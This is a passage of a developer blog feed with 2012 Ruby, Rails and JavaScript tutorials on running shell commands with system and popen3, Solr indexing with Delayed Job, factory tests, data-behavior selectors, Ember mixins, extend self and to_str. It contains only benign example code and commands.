%x[ #{cmd} ]</code></pre><h2>system</h2><p>The <a href="http://ruby-doc.org/core-1.9.3/Kernel.html#M005971">system</a> command runs in a subshell.</p><p>Just like <code>backtick</code>, <code>system</code> is a blocking operation.</p><p>Since the <code>system</code> command runs in a subshell it eats up all the exceptions. So the main operation never needs to worry about capturing an exception raised from the child process.</p><pre><code class="language-ruby">output = system('xxxxxxx')
puts &quot;output is #{output}&quot;</code></pre><p>The result of the above operation is given below. Notice that even when an exception is raised the main program completes and the output is printed. The value of output is nil because the child process raised an exception.</p><pre><code class="language-plaintext">$ ruby main.rb
output is</code></pre><p><code>system</code> returns <code>true</code> if the command was successfully performed (exit status zero). It returns <code>false</code> for a non zero exit status. It returns <code>nil</code> if command execution fails.</p><pre><code class="language-ruby">system(&quot;command that does not exist&quot;)  #=&gt; nil
system(&quot;ls&quot;)                           #=&gt; true
system(&quot;ls | grep foo&quot;)                #=&gt; false</code></pre><p><code>system</code> sets the global variable $? to the exit status of the process. Remember that a value of zero means the operation was a success.</p><p>The biggest issue with the <code>system</code> command is that it's not possible to capture the output of the operation.</p><h2>exec</h2><p><a href="http://ruby-doc.org/core-1.9.3/Kernel.html#method-i-exec">Kernel#exec</a> replaces the current process by running the external command.</p><p>Let's see an example. 
Here I am in irb and I am going to execute <code>exec('ls')</code>.</p><pre><code class="language-plaintext">$ irb
1.9.3-p194 :001 &gt; exec('ls')
lab.rb  main.rb
nsingh ~/neerajsingh$</code></pre><p>I see the result, but since the irb process was replaced by the <code>exec</code> process I am no longer in <code>irb</code>.</p><p>Behind the scenes both the <code>system</code> and <code>backtick</code> operations use <code>fork</code> to fork the current process and then they execute the given operation using <code>exec</code>.</p><p>Since <code>exec</code> replaces the current process it does not return anything. It prints the output on the screen. There is no way to know if the operation was a &quot;success&quot; or a &quot;failure&quot; and hence it's not recommended to use <code>exec</code>.</p><h2>sh</h2><p><a href="http://rake.rubyforge.org/classes/FileUtils.html">sh</a> actually calls <code>system</code> under the hood. However it is worth a mention here. This method is added by <code>FileUtils</code> in <code>rake</code>. It allows an easy way to check the exit status of the command.</p><pre><code class="language-ruby">require 'rake'

sh %w(xxxxx) do |ok, res|
  if !ok
    abort 'the operation failed'
  end
end</code></pre><h2>popen3</h2><p>If you are going to capture <code>stdout</code> and <code>stderr</code> then you should use <a href="http://www.ruby-doc.org/stdlib-1.9.3/libdoc/open3/rdoc/Open3.html#method-c-popen3">popen3</a>, since this method allows you to interact with <code>stdin</code>, <code>stdout</code> and <code>stderr</code>.</p><p>I want to execute <code>git push heroku master</code> programmatically and I want to capture the output. Here is my code.</p><pre><code class="language-ruby">require 'open3'

cmd = 'git push heroku master'
Open3.popen3(cmd) do |stdin, stdout, stderr, wait_thr|
  puts &quot;stdout is:&quot; + stdout.read
  puts &quot;stderr is:&quot; + stderr.read
end</code></pre><p>And here is the output. 
It has been truncated since the rest of the output is not relevant to this discussion.</p><pre><code class="language-plaintext">stdout is:
stderr is:-----&gt; Heroku receiving push
-----&gt; Ruby/Rails app detected
-----&gt; Installing dependencies using Bundler version 1.2.1</code></pre><p>The important thing to note here is that when I execute the program <code>ruby lab.rb</code> I do not see any output on my terminal for the first 10 seconds. Then I see the whole output as one single dump.</p><p>The other thing to note is that heroku is writing all this output to <code>stderr</code> and not to <code>stdout</code>.</p><p>The above solution works but it has one major drawback. The push to heroku might take 10 to 20 seconds and for this period we do not get any feedback on the terminal. In reality when we execute <code>git push heroku master</code> we start seeing results on our terminal one by one as heroku is processing things.</p><p>So we should capture the output from heroku as it is being streamed, rather than dumping the whole output as one single chunk of string at the end of processing.</p><p>Here is the modified code.</p><pre><code class="language-ruby">require 'open3'

cmd = 'git push heroku master'
Open3.popen3(cmd) do |stdin, stdout, stderr, wait_thr|
  while line = stderr.gets
    puts line
  end
end</code></pre><p>Now when I execute the above command using <code>ruby lab.rb</code> I get the output on my terminal incrementally, as if I had typed <code>git push heroku master</code>.</p><p>Here is another example of capturing streaming output.</p><pre><code class="language-ruby">require 'open3'

cmd = 'ping www.google.com'
Open3.popen3(cmd) do |stdin, stdout, stderr, wait_thr|
  while line = stdout.gets
    puts line
  end
end</code></pre><p>In the above case you will get the output of ping on your terminal as if you had typed <code>ping www.google.com</code> on your terminal.</p><p>Now let's see how to check if the command succeeded or not.</p><pre><code class="language-ruby">require 'open3'

cmd = 'ping www.google.com'
Open3.popen3(cmd) do |stdin, stdout, stderr, wait_thr|
  exit_status = wait_thr.value
  unless exit_status.success?
    abort &quot;FAILED !!! #{cmd}&quot;
  end
end</code></pre><h2>popen2e</h2><p><a href="http://www.ruby-doc.org/stdlib-1.9.3/libdoc/open3/rdoc/Open3.html#method-c-popen2e">popen2e</a> is similar to popen3 but merges the standard output and standard error.</p><pre><code class="language-ruby">require 'open3'

cmd = 'ping www.google.com'
Open3.popen2e(cmd) do |stdin, stdout_err, wait_thr|
  while line = stdout_err.gets
    puts line
  end

  exit_status = wait_thr.value
  unless exit_status.success?
    abort &quot;FAILED !!! #{cmd}&quot;
  end
end</code></pre><p>In all other areas this method works similar to <code>popen3</code>.</p><h2>Process.spawn</h2><p><a href="http://www.ruby-doc.org/core-1.9.3/Process.html#method-c-spawn">Kernel.spawn</a> executes the given command in a subshell. It returns immediately with the process id.</p><pre><code class="language-ruby">irb(main)&gt; pid = Process.spawn(&quot;ls -al&quot;)
=&gt; 81001</code></pre>]]></content>
    </entry><entry>
       <title><![CDATA[Redirect to www for heroku with SSL]]></title>
       <author><name>Neeraj Singh</name></author>
      <link href="https://www.bigbinary.com/blog/redirect-to-www-heroku-ssl"/>
      <updated>2012-10-12T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/redirect-to-www-heroku-ssl</id>
      <content type="html"><![CDATA[<p>If you are using heroku and you have enabled https, then the site must be redirected to use <code>www</code>. It means all Rails applications should ensure that &quot;no-www&quot; urls are redirected to &quot;www&quot;.</p><p>In Rails 3 it is pretty easy to do. Here is how it can be done.</p><pre><code class="language-ruby">Bigbinary::Application.routes.draw do
  constraints(:host =&gt; /^bigbinary\.com/) do
    root :to =&gt; redirect(&quot;http://www.bigbinary.com&quot;)
    match '/*path', :to =&gt; redirect {|params| &quot;http://www.bigbinary.com/#{params[:path]}&quot;}
  end
end</code></pre>]]></content>
    </entry><entry>
       <title><![CDATA[Solr, Sunspot, Websolr and Delayed job]]></title>
       <author><name>Neeraj Singh</name></author>
      <link href="https://www.bigbinary.com/blog/solr-sunspot-websolr-delayed-job"/>
      <updated>2012-10-11T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/solr-sunspot-websolr-delayed-job</id>
      <content type="html"><![CDATA[<p><a href="http://lucene.apache.org/solr/">Solr</a> is an open source search platform from Apache. It has a very powerful full-text search capability, among other things.</p><p>Solr is written in Java. And it runs as a standalone search server within a servlet container like Tomcat. When you are working on a Ruby on Rails application you do not want to maintain a Tomcat server. This is where <a href="https://websolr.com">websolr</a> comes into the picture. Websolr manages the index and the Rails application interacts with the index using a gem called <a href="https://github.com/outoftime/sunspot_rails">sunspot-rails</a>.</p><h2>Getting started</h2><pre><code class="language-ruby"># Gemfile
gem 'sunspot_rails', '= 1.3.3' # search feature</code></pre><p>Here I am interested in searching products.</p><pre><code class="language-ruby">class Product &lt; ActiveRecord::Base
  searchable do
    text :name, boost: 1.5
    text :description
  end
end</code></pre><h2>Using sunspot gem</h2><pre><code class="language-ruby">rails g sunspot_rails:install</code></pre><p>The above command creates the <code>config/sunspot.yml</code> file. By default this file looks like the following.</p><pre><code class="language-ruby">production:
  solr:
    hostname: localhost
    port: 8983
    log_level: WARNING

development:
  solr:
    hostname: localhost
    port: 8982
    log_level: INFO

test:
  solr:
    hostname: localhost
    port: 8981
    log_level: WARNING</code></pre><p>The way sunspot works is that after every single web request it updates solr about the changes that took place in the request. This is not desirable. To turn that off, set the <code>auto_commit_after_request</code> option to false in the <code>config/sunspot.yml</code> file.</p><p>I would also change the <code>log_level</code> for development to <code>DEBUG</code>. 
The revised <code>config/sunspot.yml</code> file would look like</p><pre><code class="language-ruby">production:
  solr:
    hostname: localhost
    port: 8983
    log_level: WARNING
    auto_commit_after_request: false

development:
  solr:
    hostname: localhost
    port: 8982
    log_level: DEBUG
    auto_commit_after_request: false

test:
  solr:
    hostname: localhost
    port: 8981
    log_level: DEBUG
    auto_commit_after_request: false</code></pre><h2>Taking care of callbacks</h2><p>In the above case, anytime I create, update or destroy a product, solr commit commands are issued as part of the <code>after_save</code> callback. Since <code>after_save</code> callbacks are part of the ActiveRecord transaction, this slows down the create, update and destroy operations. I would like all these operations to happen in the background.</p><p>Here is how I handled it.</p><pre><code class="language-ruby">class Product &lt; ActiveRecord::Base
  searchable do
    text :name, boost: 1.5
    text :description
  end

  handle_asynchronously :solr_index, queue: 'indexing', priority: 50
  handle_asynchronously :solr_index!, queue: 'indexing', priority: 50
  handle_asynchronously :remove_from_index, queue: 'indexing', priority: 50
end</code></pre><p>In the above case I used <a href="https://github.com/collectiveidea/delayed_job">Delayed Job</a> but you can use any background job processing tool.</p><p>In case of Delayed Job, the higher the priority value the lower the priority. By bumping the priority value to 50, I'm making sure that emails and other background jobs are processed before solr work is taken up.</p><h2>Problem with <code>remove_from_index</code></h2><p>In the above case the call to <code>remove_from_index</code> has been deferred to Delayed Job. However the record has already been destroyed. So when Delayed Job takes up the work it first tries to retrieve the record. 
However the record is missing and the background job fails.</p><p>Here is how we solved this problem.</p><pre><code class="language-ruby">class Product &lt; ActiveRecord::Base
  searchable do
    text :name, boost: 1.5
    text :description
  end

  handle_asynchronously :solr_index, queue: 'indexing', priority: 50
  handle_asynchronously :solr_index!, queue: 'indexing', priority: 50

  def remove_from_index_with_delayed
    Delayed::Job.enqueue RemoveIndexJob.new(record_class: self.class.to_s, attributes: self.attributes), queue: 'indexing', priority: 50
  end
  alias_method_chain :remove_from_index, :delayed
end</code></pre><p>Add another worker named <code>remove_index.rb</code>.</p><pre><code class="language-ruby">class RemoveIndexJob &lt; Struct.new(:options)
  def perform
    return if options.nil?

    options.symbolize_keys!
    record = options[:record_class].constantize.new options[:attributes].except(&quot;id&quot;)
    record.id = options[:attributes][&quot;id&quot;]
    record.remove_from_index_without_delayed
  end
end</code></pre><h2>Connecting to websolr</h2><p>From the websolr documentation it was not clear that the sunspot gem first looks for an environment variable called <code>WEBSOLR_URL</code>, and if that environment variable has a value then sunspot assumes that the solr index is at that url. If no value is found then it assumes that it is dealing with a local solr instance.</p><p>So if you are using websolr then make sure that your application has the environment variable <code>WEBSOLR_URL</code> properly configured in the staging and production environments.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Test factories first]]></title>
       <author><name>Neeraj Singh</name></author>
      <link href="https://www.bigbinary.com/blog/test-factories-first"/>
      <updated>2012-10-10T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/test-factories-first</id>
      <content type="html"><![CDATA[<p>In a <a href="http://robots.thoughtbot.com/post/30994874643/testing-your-factories-first">blog post</a> the thoughtbot team outlined how they test their factories first. I like this approach. Since we prefer using minitest, here is how we implemented it. It is similar to what the thoughtbot blog has described. However I still want to blog about it so that in our other projects we can use a similar approach.</p><p>First, under the <code>spec</code> directory create a file called <code>factories_spec.rb</code>. Here is how our file looks.</p><pre><code class="language-ruby">require File.expand_path(File.dirname(__FILE__) + '/spec_helper')

describe FactoryGirl do
  EXCEPTIONS = %w(base_address base_batch bad_shipping_address shipping_method_rate bad_billing_address)

  FactoryGirl.factories.each do |factory|
    next if EXCEPTIONS.include?(factory.name.to_s)

    describe &quot;The #{factory.name} factory&quot; do
      it 'is valid' do
        instance = build(factory.name)
        instance.must_be :valid?
      end
    end
  end
end</code></pre><p>Next I need to tell rake to always run this test file first.</p><p>When the rake command is executed it goes through all the <code>.rake</code> files and loads them. So all we need to do is to create a rake file called <code>factory.rake</code> and put this file under <code>lib/tasks</code>.</p><pre><code class="language-ruby">desc 'Run factory specs.'
Rake::TestTask.new(:factory_specs) do |t|
  t.pattern = './spec/factories_spec.rb'
end

task test: :factory_specs</code></pre><p>Here a dependency is being added to <code>test</code>. If the factory tests fail then the dependency is not met and the main test suite will not run.</p><p>That's it. Now each unit test does not need to test the factory first. All factories are getting tested here.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Data-behavior is for JavaScript developers]]></title>
       <author><name>Neeraj Singh</name></author>
      <link href="https://www.bigbinary.com/blog/data-behavior"/>
      <updated>2012-10-10T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/data-behavior</id>
      <content type="html"><![CDATA[<p>I have written a lot of JavaScript code like this</p><pre><code class="language-javascript">$(&quot;.product_pictures .actions .delete&quot;).on &quot;click&quot;, -&gt;
  do_something_useful</code></pre><p>The problem with the above code is that the class names in the html markup were meant for web design. By using css classes for functional work, I have made both the design team and the front end development team perpetually terrified of making any change.</p><h2>Class is meant for CSS</h2><p>If a designer wants to change the markup from</p><pre><code class="language-html">&lt;div class=&quot;first actions&quot;&gt;
  xxx
  &lt;div&gt;&lt;/div&gt;
&lt;/div&gt;</code></pre><p>to</p><pre><code class="language-html">&lt;div class=&quot;first actions-items&quot;&gt;
  xxx
  &lt;div&gt;&lt;/div&gt;
&lt;/div&gt;</code></pre><p>they are not too sure what JavaScript code might break. So they work around it.</p><p>The same goes for JavaScript developers. They do not want to unintentionally remove a class, otherwise the web design might get messed up.</p><p>There has to be a better way which clearly separates the design elements from the functional elements.</p><h2>data-behavior to the rescue</h2><p><a href="https://twitter.com/qrush">Nick Quaranto</a> of 37signals presented <a href="http://37signals.com/svn/posts/3167-code-spelunking-in-the-all-new-basecamp">Code spelunking in the All New Basecamp</a> in a <a href="http://www.youtube.com/watch?v=oXTzFCXE66M">video</a>.</p><p>In his presentation he mentioned <code>data-behavior</code>.</p><p><code>data-behavior</code> usage can be best understood by an example.</p><pre><code class="language-javascript">// no data-behavior
$(&quot;.product_pictures .actions .delete&quot;).on(&quot;click&quot;, function(){});</code></pre><pre><code class="language-javascript">// code with data-behavior
$('[data-behavior~=delete-product-picture]').on('click', function(){});

// Another style with the same effect
$(document).on('click', &quot;[data-behavior~=delete-product-picture]&quot;, function(){ });</code></pre><p>The html markup will change from</p><pre><code class="language-ruby">&lt;%= link_to '#', class: 'delete', &quot;data-action-id&quot; =&gt; picture.id do %&gt;</code></pre><p>to</p><pre><code class="language-ruby">&lt;%= link_to '#', class: 'delete', &quot;data-action-id&quot; =&gt; picture.id, 'data-behavior' =&gt; 'delete-product-picture' do %&gt;</code></pre><p>The above code would produce html looking something like this</p><pre><code class="language-html">&lt;a
  class=&quot;delete&quot;
  data-action-id=&quot;&quot;
  data-behavior=&quot;delete-product-picture&quot;
  href=&quot;#&quot;&gt;
  &lt;button&gt;Delete&lt;/button&gt;
&lt;/a&gt;</code></pre><p>Now in the above case the designer can change the css class as desired and it will have no impact on the JavaScript functionality.</p><h2>More usage of data-behavior</h2><p>Based on this data-behavior approach I changed some parts of a project I was working on to use data-behavior.</p><p><code>data-behavior</code> is a very simple and effective tool for achieving a clear separation between design elements and JavaScript functional work.</p><h2>Code snippet for reference</h2><p>Over a period of time we have used this technique in many projects successfully. However sometimes I need to spend a while to find the right way to add <code>data-behavior</code>. 
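</p><p>One detail worth remembering is why the selector uses <code>~=</code> rather than <code>=</code>: <code>data-behavior</code> can hold several space-separated behaviors, and <code>~=</code> matches whole words within that list. A tiny Ruby sketch of that matching rule (the attribute values are hypothetical):</p>

```ruby
# Mimics the CSS/jQuery [attr~=value] rule: the value must appear as a
# whole space-separated word inside the attribute value.
def behavior_match?(attribute_value, behavior)
  attribute_value.split(" ").include?(behavior)
end

puts behavior_match?("delete-product-picture highlight", "delete-product-picture") #=> true
puts behavior_match?("delete-product", "delete-product-picture")                   #=> false
```

<p>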
I'm adding some code snippets so that I can find them here when I need them.</p><pre><code class="language-ruby">%div{ class: &quot;&quot;, &quot;data-behavior&quot; =&gt; &quot;search-container&quot; }

.div{ data: { behavior: 'search-container' }, style: &quot;&quot; }

= button_tag '', :class =&gt; &quot;&quot;, &quot;data-behavior&quot; =&gt; &quot;search-container&quot;

= link_to 'Edit', &quot;#&quot;,
          data: { behavior: 'display-in-modal', url: '' },
          class: &quot;&quot;

= f.check_box :include_annual_workplan,
              'data-behavior' =&gt; 'input-include-workplan'

= f.text_area :content, placeholder: &quot;&quot;,
                        class: '',
                        data: { behavior: &quot;comment-content&quot; }

= f.text_field :name, class: '',
                      'data-behavior' =&gt; 'input-client-name'

= form_for '', data: { remote: true, behavior: 'add-comment-form' } do |f|</code></pre>]]></content>
    </entry><entry>
       <title><![CDATA[emberjs mixin]]></title>
       <author><name>Neeraj Singh</name></author>
      <link href="https://www.bigbinary.com/blog/emberjs-mixin"/>
      <updated>2012-08-27T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/emberjs-mixin</id>
      <content type="html"><![CDATA[<p>emberjs has a mixin feature which allows code reuse and keeps code modular. It also supports the <code>_super()</code> method.</p><h2>mixin using apply</h2><pre><code class="language-javascript">m = Ember.Mixin.create({
  skill: function () {
    return &quot;JavaScript &amp; &quot; + this._super();
  },
});

main = {
  skill: function () {
    return &quot;Ruby&quot;;
  },
};

o = m.apply(main);
console.log(o.skill()); // =&gt; &quot;JavaScript &amp; Ruby&quot;</code></pre><h2>mixin in create and extend</h2><p>Now let's see the usage of mixin in <code>create</code> and <code>extend</code>. Since <code>create</code> and <code>extend</code> work similarly I am only going to discuss the <code>create</code> scenario.</p><pre><code class="language-javascript">skillJavascript = Ember.Mixin.create({
  skill: function () {
    return &quot;JavaScript&quot;;
  },
});

main = {
  skill: function () {
    return &quot;Ruby &amp; &quot; + this._super();
  },
};

p = Ember.Object.create(skillJavascript, main);
console.log(p.skill()); // =&gt; &quot;Ruby &amp; JavaScript&quot;</code></pre><p>Notice that in the first case the mixin code was executed first. In the second case the mixin code was executed later.</p><h2>Here is how it works</h2><p><a href="https://github.com/emberjs/ember.js/blob/master/packages/ember-metal/lib/mixin.js#L65">Here is the mergeMixins code</a> which accepts the mixins and the base class. In the first case the mixins list is just the mixin and the base class is the main class.</p><p>At run time all the mixin properties are looped through. In the first case the mixin <code>m</code> has a property called <code>skill</code>.</p><pre><code class="language-javascript">m.mixins[0].properties.skill
function () {
  return 'JavaScript &amp; ' + this._super()
}</code></pre><p>The runtime detects that both the mixin and the base class have a property called <code>skill</code>. 
Since the base class has the first claim to the property, a call is made to link the <code>_super</code> of the second function to the first function.</p><p>That work is done by the <a href="https://github.com/emberjs/ember.js/blob/master/packages/ember-metal/lib/utils.js#L287-316">wrap</a> function.</p><p>So at the end of the execution the mixin code points to the base code as <code>_super</code>.</p><h2>It reverses itself in case of create</h2><p>In the second case the mixin <code>skillJavascript</code> and <code>main</code> are the mixins to the base class of <code>Class</code>. The mixin is first in the looping order. So the mixin has the first claim to the key <code>skill</code>, since it was unclaimed by the base class to begin with.</p><p>Next comes the main function, and since the key is already taken the wrap function is used to map the <code>_super</code> of main to point to the mixin.</p><h2>Remember in create and extend it is the last one that executes first</h2><p>Here is an example with two mixins.</p><pre><code class="language-javascript">skillHaskell = Ember.Mixin.create({
  skill: function () {
    return &quot;Haskell&quot;;
  },
});

skillJavascript = Ember.Mixin.create({
  skill: function () {
    return &quot;JavaScript &amp; &quot; + this._super();
  },
});

p = Ember.Object.create(skillHaskell, skillJavascript, {
  skill: function () {
    return &quot;Ruby &amp; &quot; + this._super();
  },
});

console.log(p.skill()); // =&gt; &quot;Ruby &amp; JavaScript &amp; Haskell&quot;</code></pre><p>In this case the Haskell mixin first claimed the key. So the JavaScript mixin's <code>_super</code> points to Haskell and the main code's <code>_super</code> points to JavaScript.</p><h2>emberjs makes good use of mixin</h2><p>emberjs has features like <code>comparable</code>, <code>freezable</code>, <code>enumerable</code>, <code>sortable</code> and <code>observable</code> implemented as mixins. Take a look at the emberjs source code to check them out.</p>]]></content>
    </entry><entry>
       <title><![CDATA[extend self in ruby]]></title>
       <author><name>Neeraj Singh</name></author>
      <link href="https://www.bigbinary.com/blog/extend-self-in-ruby"/>
      <updated>2012-06-28T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/extend-self-in-ruby</id>
      <content type="html"><![CDATA[<p><em>The following code was tested with ruby 1.9.3.</em></p><h2>Class is meant for both data and behavior</h2><p>Let's look at this ruby code.</p><pre><code class="language-ruby">class Util
  def self.double(i)
    i * 2
  end
end

Util.double(4) #=&gt; 8</code></pre><p>Here we have a <code>Util</code> class. But notice that all the methods on this class are class methods. This class does not have any instance variables. Usually a class is used to carry both data and behavior and, in this case, the Util class has only behavior and no data.</p><h2>Similar utility tools in ruby</h2><p>Now to get some perspective on this discussion, let's look at some ruby methods that do a similar thing. Here are a few.</p><pre><code class="language-ruby">require 'base64'
Base64.encode64('hello world') #=&gt; &quot;aGVsbG8gd29ybGQ=\n&quot;

require 'benchmark'
Benchmark.measure { 10*2000 }

require 'fileutils'
FileUtils.chmod 0644, 'test.rb'

Math.sqrt(4) #=&gt; 2.0</code></pre><p>In all the above cases the class method is invoked without creating an instance first. So this is similar to the way I used <code>Util.double</code>.</p><p>However, let's see what the class of each of these objects is.</p><pre><code class="language-ruby">Base64.class #=&gt; Module
Benchmark.class #=&gt; Module
FileUtils.class #=&gt; Module
Math.class #=&gt; Module</code></pre><p>So these are not classes but modules. That begs the question: why did the smart folks at ruby-core implement them as modules instead of creating a class the way I did for Util?</p><p>The reason is that a Class is too heavy for creating only methods like <code>double</code>. As we discussed earlier, a class is supposed to have both data and behavior. 
If the only thing you care about is behavior then ruby suggests implementing it as a module.</p><h2>extend self is the answer</h2><p>Before I go on to discuss <code>extend self</code>, here is how my <code>Util</code> class will look after moving from <code>Class</code> to <code>Module</code>.</p><pre><code class="language-ruby">module Util
  extend self

  def double(i)
    i * 2
  end
end

puts Util.double(4) #=&gt; 8</code></pre><h3>So how does extend self work</h3><p>First, let's see what extend does.</p><pre><code class="language-ruby">module M
  def double(i)
    i * 2
  end
end

class Calculator
  extend M
end

puts Calculator.double(4)</code></pre><p>In the above case <code>Calculator</code> is extending module <code>M</code> and hence all the instance methods of module <code>M</code> are directly available on <code>Calculator</code>.</p><p>In this case <code>Calculator</code> is a class that extended the module <code>M</code>. However <code>Calculator</code> does not have to be a class to extend a module.</p><p>Now let's try a variation where <code>Calculator</code> is a module.</p><pre><code class="language-ruby">module M
  def double(i)
    i * 2
  end
end

module Calculator
  extend M
end

puts Calculator.double(4) #=&gt; 8</code></pre><p>Here Calculator is a module that is extending another module.</p><p>Now that we understand that a module can extend another module, look at the above code and question why module <code>M</code> is even needed. Why can't we move the method <code>double</code> to module Calculator directly? Let's try that.</p><pre><code class="language-ruby">module Calculator
  extend Calculator

  def double(i)
    i * 2
  end
end

puts Calculator.double(4) #=&gt; 8</code></pre><p>I got rid of module <code>M</code> and moved the method <code>double</code> inside module <code>Calculator</code>. Since module <code>M</code> is gone I changed <code>extend M</code> to <code>extend Calculator</code>.</p><p>One last fix.</p><p>Inside the module Calculator, what is <code>self</code>? 
<code>self</code> is the module <code>Calculator</code> itself. So there is no need to repeat <code>Calculator</code> twice. Here is the final version.</p><pre><code class="language-ruby">module Calculator
  extend self

  def double(i)
    i * 2
  end
end

puts Calculator.double(4) #=&gt; 8</code></pre><h2>Converting a Class into a Module</h2><p>Every time I would encounter code like <code>extend self</code>, my brain would pause for a moment. Then I would google for it and read about it. Three months later I would repeat the whole process.</p><p>The best way to learn it is to use it. So I started looking for a case to use <code>extend self</code>. It is not a good practice to go hunting for code to apply an idea you have in your mind, but here I was trying to learn.</p><p>Here is a before snapshot of methods from a <code>Util</code> class I used in a project.</p><pre><code class="language-ruby">class Util
  def self.config2hash(file); end
  def self.in_cents(amount); end
  def self.localhost2public_url(url, protocol); end
end</code></pre><p>After using <code>extend self</code> the code became</p><pre><code class="language-ruby">module Util
  extend self

  def config2hash(file); end
  def in_cents(amount); end
  def localhost2public_url(url, protocol); end
end</code></pre><p>Much better. It makes the intent clear and, I believe, it is in line with the way Ruby expects to be used.</p><h2>Another usage in line with how Rails uses extend self</h2><p>Here I am building an ecommerce application and each new order needs to get a new order number from a third-party sales application. The code might look like this.
I have omitted the implementation of the methods because they are not relevant to this discussion.</p><pre><code class="language-ruby">class Order
  def amount; end
  def buyer; end
  def shipped_at; end

  def number
    @number || self.class.next_order_number
  end

  def self.next_order_number; 'A100'; end
end

puts Order.new.number #=&gt; A100</code></pre><p>Here the method <code>next_order_number</code> might be making a complicated call to another sales system. Ideally the class <code>Order</code> should not expose the method <code>next_order_number</code>. We could make this method <code>private</code>, but that does not solve the root problem. The problem is that the model <code>Order</code> should not know how the new order number is generated. Well, we could move the method <code>next_order_number</code> to another <code>Util</code> class, but that would create too much distance.</p><p>Here is a solution using <code>extend self</code>.</p><pre><code class="language-ruby">module Checkout
  extend self

  def next_order_number; 'A100'; end

  class Order
    def amount; end
    def buyer; end
    def shipped_at; end

    def number
      @number || Checkout.next_order_number
    end
  end
end

puts Checkout::Order.new.number #=&gt; A100</code></pre><p>Much better. The class Order is not exposing the method <code>next_order_number</code> and this method is right there in the same file. No need to open the <code>Util</code> class.</p><p>To see practical examples of <code>extend self</code>, look at the Rails source code and search for <code>extend self</code>. You will find some interesting usages.</p><p>This is my first serious attempt to learn the usage of <code>extend self</code> so that next time I come across such code my brain does not freeze. If you think I have missed out something then do let me know.</p>]]></content>
    </entry><entry>
       <title><![CDATA[to_str in ruby]]></title>
       <author><name>Neeraj Singh</name></author>
      <link href="https://www.bigbinary.com/blog/to_str-in-ruby"/>
      <updated>2012-06-26T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/to_str-in-ruby</id>
<content type="html"><![CDATA[<p><em>The following code was tested with Ruby 1.9.3.</em></p><h2>All objects have a to_s method</h2><p>The <code>to_s</code> method is defined in the <code>Object</code> class and hence all Ruby objects have the method <code>to_s</code>.</p><p>Certain methods always call the <code>to_s</code> method. For example, when we do string interpolation the <code>to_s</code> method is called. <code>puts</code> invokes the <code>to_s</code> method too.</p><pre><code class="language-ruby">class Lab
  def to_s
    'to_s'
  end

  def to_str
    'to_str'
  end
end

l = Lab.new
puts &quot;#{l}&quot; #=&gt; to_s
puts l      #=&gt; to_s</code></pre><p><code>to_s</code> is simply the string representation of the object.</p><p>Before we look at <code>to_str</code>, let's see a case where Ruby raises an error.</p><pre><code class="language-ruby">e = Exception.new('not sufficient fund')

# case 1
puts e

# case 2
puts &quot;notice: #{e}&quot;

# case 3
puts &quot;Notice: &quot; + e</code></pre><p>Here is the result</p><pre><code class="language-text">not sufficient fund
notice: not sufficient fund
`+': can't convert Exception into String (TypeError)</code></pre><p>In the first two cases the <code>to_s</code> method of object <code>e</code> was printed.</p><p>However, in case 3 Ruby raised an error.</p><p>Let's read the error message again.</p><pre><code class="language-text">`+': can't convert Exception into String (TypeError)</code></pre><p>In this case, on the left hand side we have a string object. To this string object we are trying to add the object <code>e</code>. Ruby could have called the <code>to_s</code> method on <code>e</code> and produced a result. But Ruby refused to do so.</p><p>Ruby refused because it found that the object we are trying to add to the string is not of type String. When we call <code>to_s</code> we get the string representation of the object. But the object might or might not behave like a string.</p><p>Here we are not looking for the string representation of <code>e</code>.
What we want is for <code>e</code> to behave like a string. And that is where <code>to_str</code> comes into the picture. I have a few more examples to make this clear, so hang in there.</p><h2>What is to_str</h2><p>If an object implements the <code>to_str</code> method then it is telling the world: my class might not be <code>String</code>, but for all practical purposes treat me like a string.</p><p>So if we want to make the exception object behave like a string then we can add a <code>to_str</code> method to it like this.</p><pre><code class="language-ruby">e = Exception.new('not sufficient fund')

def e.to_str
  to_s
end

puts &quot;Notice: &quot; + e #=&gt; Notice: not sufficient fund</code></pre><p>Now when we run the code we do not get any exception.</p><h2>What would happen if Fixnum had a to_str method</h2><p>Here is an example where Ruby raises an exception.</p><pre><code class="language-ruby">i = 10
puts '7' + i #=&gt; can't convert Fixnum into String (TypeError)</code></pre><p>Here Ruby is saying that a Fixnum is not like a string and it should not be added to a String.</p><p>We can make Fixnum behave like a string by adding a <code>to_str</code> method.</p><pre><code class="language-ruby">class Fixnum
  def to_str
    to_s
  end
end

i = 10
puts '7' + i #=&gt; 710</code></pre><p>The practical usage of this example can be seen here.</p><pre><code class="language-text">irb(main):002:0&gt; [&quot;hello&quot;, &quot;world&quot;].join(1)
TypeError: no implicit conversion of Fixnum into String</code></pre><p>In the above case Ruby is refusing to invoke <code>to_s</code> on <code>1</code> because it knows that implicitly joining an integer into a string does not feel right.</p><p>However, we can add the method <code>to_str</code> to Fixnum as shown in the last section and then we will not get any error.
In this case the result will be as shown below.</p><pre><code class="language-text">irb(main):008:0&gt; [&quot;hello&quot;, &quot;world&quot;].join(1)
=&gt; &quot;hello1world&quot;</code></pre><h2>A real practical example of defining to_str</h2><p>I <a href="https://twitter.com/neerajsingh0101/status/217128187489042432">tweeted</a> about <a href="https://github.com/rails/rails/commit/188cc90af9b29d5520564af7bd7bbcdc647953ca">a quick lesson in to_s vs to_str</a> and a few people asked me to expand on that. Let's see what is happening here.</p><p>Before the refactoring, <code>Path</code> was a subclass of <code>String</code>. So it was a String and it had all the methods of a string.</p><p>As part of the refactoring, <code>Path</code> no longer extends <code>String</code>. However, for all practical purposes it acts like a string. This line is important and I am going to repeat it: for all practical purposes <code>Path</code> here is like a <code>String</code>.</p><p>Here we are not talking about the string representation of <code>Path</code>. Here <code>Path</code> is so close to <code>String</code> that practically it can be substituted for a string.</p><p>So in order to be like the <code>String</code> class, <code>Path</code> should have a <code>to_str</code> method, and that's exactly what was done as part of the refactoring.</p><p>During a discussion with my friends, someone suggested that instead of defining <code>to_str</code> tenderlove could have just defined <code>to_s</code> and the result would have been the same.</p><p>Yes, the result would be the same whether you have defined <code>to_s</code> or <code>to_str</code> if you are doing 